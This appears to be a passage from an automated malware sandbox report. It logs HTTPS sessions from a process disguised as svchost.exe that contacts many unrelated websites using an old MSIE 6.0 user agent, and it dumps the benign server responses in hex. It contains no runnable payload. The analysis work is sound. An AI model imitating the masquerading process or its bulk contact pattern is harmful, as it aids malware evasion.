href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></s
2023-03-22 04:45:36 UTC	1151	IN	Data Raw: 6c 61 20 65 73 70 65 72 61 6e 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c Data Ascii: la esperanza del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0,
2023-03-22 04:45:36 UTC	1152	IN	Data Raw: 20 6f 70 65 6e 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a Data Ascii: openEffect: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,
2023-03-22 04:45:36 UTC	1153	IN	Data Raw: 70 5f 61 68 6f 6c 69 63 27 29 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f Data Ascii: p_aholic');refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto
2023-03-22 04:45:36 UTC	1155	IN	Data Raw: 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 Data Ascii: ble "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></di
2023-03-22 04:45:36 UTC	1156	IN	Data Raw: 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 Data Ascii: k hidden-phone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div
2023-03-22 04:45:36 UTC	1157	IN	Data Raw: 6d 61 67 65 73 2f 68 6f 6d 65 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 Data Ascii: mages/home/apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnsti
2023-03-22 04:45:36 UTC	1159	IN	Data Raw: 61 63 69 6f 6e 22 3e 56 61 63 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 Data Ascii: acion">Vacunacin</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class
2023-03-22 04:45:36 UTC	1160	IN	Data Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: "><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="
2023-03-22 04:45:36 UTC	1161	IN	Data Raw: 65 33 61 65 61 32 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e Data Ascii: e3aea2">[email protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Con
2023-03-22 04:45:36 UTC	1163	IN	Data Raw: 6c 61 73 73 3d 22 67 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d Data Ascii: lass="g-title">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-
2023-03-22 04:45:36 UTC	1164	IN	Data Raw: 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 Data Ascii: div></div></div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title=""
2023-03-22 04:45:36 UTC	1165	IN	Data Raw: 35 30 63 0d 0a 3d 22 67 2d 73 6f 63 69 61 6c 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a Data Ascii: 50c="g-social-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/j
2023-03-22 04:45:36 UTC	1167	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.5	24426	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:36 UTC	1167	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:36 UTC	1167	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:36 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:36 UTC	1167	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.5	24451	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1168	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:45:37 UTC	1168	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:45:37 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:45:37 UTC	1168	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.5	24424	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1169	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.5	24947	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1170	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:45:37 UTC	1170	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:45:37 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:37 UTC	1170	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	50314	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:31 UTC	65	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:44:31 UTC	66	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:44:31 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:44:31 UTC	67	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.5	25237	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1170	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:45:37 UTC	1171	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:45:37 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:37 UTC	1171	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.5	25239	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1170	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
